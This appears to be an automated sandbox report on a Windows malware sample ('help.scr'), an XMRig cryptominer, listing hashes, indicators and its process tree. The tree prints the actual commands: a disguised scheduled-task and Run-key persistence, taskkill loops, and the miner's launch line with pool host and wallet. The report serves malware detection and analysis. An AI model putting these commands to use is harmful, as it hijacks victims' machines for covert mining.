xmrig | d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239

General

Target

help.scr
Size

9.0MB
MD5

2d927fdb462570728a981443bf36d19f
SHA1

eb4f351d937729b14a196bf228ba12a2ff07e73e
SHA256

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239
SHA512

efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9
SSDEEP

196608:rhHMBGC3PtXtT+Was8/wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G02wuwasMdJOnZKVSaaNZOn

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 21 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4452-132-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/4452-138-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/2688-142-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/4304-148-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/4304-150-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/2892-153-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/4552-157-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/5908-161-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/6068-165-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/4436-169-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/5980-173-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/1348-180-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/3020-184-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/3084-188-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/6036-200-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/3028-204-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/6108-207-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/6108-208-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/5096-211-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/5832-214-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig
behavioral2/memory/5832-215-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	xmrig

Executes dropped EXE 21 IoCs

Processes:

spreadTpqrst.exeSMB.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exe

pid	process
4452	spreadTpqrst.exe
3948	SMB.exe
2688	spreadTpqrst.exe
4304	spreadTpqrst.exe
2892	spreadTpqrst.exe
4552	spreadTpqrst.exe
5908	spreadTpqrst.exe
6068	spreadTpqrst.exe
4436	spreadTpqrst.exe
5980	spreadTpqrst.exe
6104	spreadTpqrst.exe
5984	spreadTpqrst.exe
1348	spreadTpqrst.exe
3020	spreadTpqrst.exe
3084	spreadTpqrst.exe
6036	spreadTpqrst.exe
3028	spreadTpqrst.exe
6108	spreadTpqrst.exe
5096	spreadTpqrst.exe
5832	spreadTpqrst.exe
1100	spreadTpqrst.exe

UPX packed file 25 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\spreadTpqrst.exe	upx
behavioral2/memory/4452-8-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/4452-132-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/4452-138-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/2688-142-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/4304-148-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/4304-150-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/2892-153-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/4552-157-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/5908-161-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/6068-165-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/4436-169-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/5980-173-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/6104-176-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/1348-180-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/3020-184-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/3084-188-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/6036-200-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/3028-204-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/6108-207-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/6108-208-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/5096-211-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/5832-214-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/5832-215-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx
behavioral2/memory/1100-218-0x00007FF78FA00000-0x00007FF790044000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

help.scr

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\help.scr"	help.scr
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\help.scr"	help.scr

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

help.scr

description ioc process

File opened (read-only) \??\K: help.scr
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

help.scr

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN help.scr

description	ioc	process
File opened (read-only)	\??\K:	help.scr

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	help.scr

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

help.scr

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	help.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	help.scr

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

536 schtasks.exe
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

4180 ipconfig.exe
4628 ipconfig.exe
5844 ipconfig.exe
4396 ipconfig.exe
5832 ipconfig.exe
3344 ipconfig.exe

pid	process
536	schtasks.exe

pid	process
4180	ipconfig.exe
4628	ipconfig.exe
5844	ipconfig.exe
4396	ipconfig.exe
5832	ipconfig.exe
3344	ipconfig.exe

Kills process with taskkill 11 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5820	taskkill.exe
5824	taskkill.exe
1468	taskkill.exe
6096	taskkill.exe
5972	taskkill.exe
668	taskkill.exe
5892	taskkill.exe
6112	taskkill.exe
1236	taskkill.exe
2160	taskkill.exe
1856	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

help.scr

pid	process
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr
3756	help.scr

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

help.scr

pid process

3756 help.scr

Suspicious use of AdjustPrivilegeToken 55 IoCs

Processes:

help.scrtaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3756	help.scr
Token: SeBackupPrivilege	3756	help.scr
Token: SeSecurityPrivilege	3756	help.scr
Token: SeSecurityPrivilege	3756	help.scr
Token: SeBackupPrivilege	3756	help.scr
Token: SeSecurityPrivilege	3756	help.scr
Token: SeBackupPrivilege	3756	help.scr
Token: SeSecurityPrivilege	3756	help.scr
Token: SeBackupPrivilege	3756	help.scr
Token: SeSecurityPrivilege	3756	help.scr
Token: SeDebugPrivilege	2160	taskkill.exe
Token: SeLockMemoryPrivilege	4452	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4452	spreadTpqrst.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeLockMemoryPrivilege	2688	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2688	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4304	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4304	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2892	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2892	spreadTpqrst.exe
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeLockMemoryPrivilege	4552	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4552	spreadTpqrst.exe
Token: SeDebugPrivilege	5972	taskkill.exe
Token: SeLockMemoryPrivilege	5908	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5908	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6068	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6068	spreadTpqrst.exe
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeLockMemoryPrivilege	4436	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4436	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5980	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5980	spreadTpqrst.exe
Token: SeDebugPrivilege	5892	taskkill.exe
Token: SeDebugPrivilege	6096	taskkill.exe
Token: SeLockMemoryPrivilege	1348	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1348	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	3020	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	3020	spreadTpqrst.exe
Token: SeDebugPrivilege	5820	taskkill.exe
Token: SeLockMemoryPrivilege	3084	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	3084	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6036	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6036	spreadTpqrst.exe
Token: SeDebugPrivilege	6112	taskkill.exe
Token: SeLockMemoryPrivilege	3028	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	3028	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6108	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6108	spreadTpqrst.exe
Token: SeDebugPrivilege	5824	taskkill.exe
Token: SeLockMemoryPrivilege	5096	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5096	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5832	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5832	spreadTpqrst.exe
Token: SeDebugPrivilege	1236	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

help.scrcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3756 wrote to memory of 4904	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 4904	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 4904	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1492	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1492	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1492	3756	help.scr	cmd.exe
PID 4904 wrote to memory of 536	4904	cmd.exe	schtasks.exe
PID 4904 wrote to memory of 536	4904	cmd.exe	schtasks.exe
PID 4904 wrote to memory of 536	4904	cmd.exe	schtasks.exe
PID 1492 wrote to memory of 2160	1492	cmd.exe	taskkill.exe
PID 1492 wrote to memory of 2160	1492	cmd.exe	taskkill.exe
PID 1492 wrote to memory of 2160	1492	cmd.exe	taskkill.exe
PID 3756 wrote to memory of 4968	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 4968	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 4968	3756	help.scr	cmd.exe
PID 4968 wrote to memory of 4180	4968	cmd.exe	ipconfig.exe
PID 4968 wrote to memory of 4180	4968	cmd.exe	ipconfig.exe
PID 4968 wrote to memory of 4180	4968	cmd.exe	ipconfig.exe
PID 3756 wrote to memory of 4452	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 4452	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 3948	3756	help.scr	SMB.exe
PID 3756 wrote to memory of 3948	3756	help.scr	SMB.exe
PID 3756 wrote to memory of 3948	3756	help.scr	SMB.exe
PID 3756 wrote to memory of 2772	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 2772	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 2772	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 2688	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 2688	3756	help.scr	spreadTpqrst.exe
PID 2772 wrote to memory of 1468	2772	cmd.exe	taskkill.exe
PID 2772 wrote to memory of 1468	2772	cmd.exe	taskkill.exe
PID 2772 wrote to memory of 1468	2772	cmd.exe	taskkill.exe
PID 3756 wrote to memory of 4304	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 4304	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 1004	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1004	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1004	3756	help.scr	cmd.exe
PID 1004 wrote to memory of 4628	1004	cmd.exe	ipconfig.exe
PID 1004 wrote to memory of 4628	1004	cmd.exe	ipconfig.exe
PID 1004 wrote to memory of 4628	1004	cmd.exe	ipconfig.exe
PID 3756 wrote to memory of 1324	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1324	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 1324	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 2892	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 2892	3756	help.scr	spreadTpqrst.exe
PID 1324 wrote to memory of 1856	1324	cmd.exe	taskkill.exe
PID 1324 wrote to memory of 1856	1324	cmd.exe	taskkill.exe
PID 1324 wrote to memory of 1856	1324	cmd.exe	taskkill.exe
PID 3756 wrote to memory of 4552	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 4552	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 5792	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 5792	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 5792	3756	help.scr	cmd.exe
PID 5792 wrote to memory of 5844	5792	cmd.exe	ipconfig.exe
PID 5792 wrote to memory of 5844	5792	cmd.exe	ipconfig.exe
PID 5792 wrote to memory of 5844	5792	cmd.exe	ipconfig.exe
PID 3756 wrote to memory of 5872	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 5872	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 5872	3756	help.scr	cmd.exe
PID 3756 wrote to memory of 5908	3756	help.scr	spreadTpqrst.exe
PID 3756 wrote to memory of 5908	3756	help.scr	spreadTpqrst.exe
PID 5872 wrote to memory of 5972	5872	cmd.exe	taskkill.exe
PID 5872 wrote to memory of 5972	5872	cmd.exe	taskkill.exe
PID 5872 wrote to memory of 5972	5872	cmd.exe	taskkill.exe
PID 3756 wrote to memory of 6068	3756	help.scr	spreadTpqrst.exe

C:\Users\Admin\AppData\Local\Temp\help.scr
"C:\Users\Admin\AppData\Local\Temp\help.scr" /S
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\help.scr /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\help.scr /F
3⤵
- Creates scheduled task(s)
PID:536

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:4180

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\ProgramData\SMB.exe
C:\ProgramData\SMB.exe
2⤵
- Executes dropped EXE
PID:3948

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:1004

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:4628

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2892

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4552

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:5792

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:5844

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:5872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5972

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5908

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6068

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:5832

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5980

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:3020

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5892

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
PID:6104

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
PID:5984

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:3344

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6096

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:5876

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:4396

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:6052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5820

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3084

C:\ProgramData\spreadTpqrst.exe
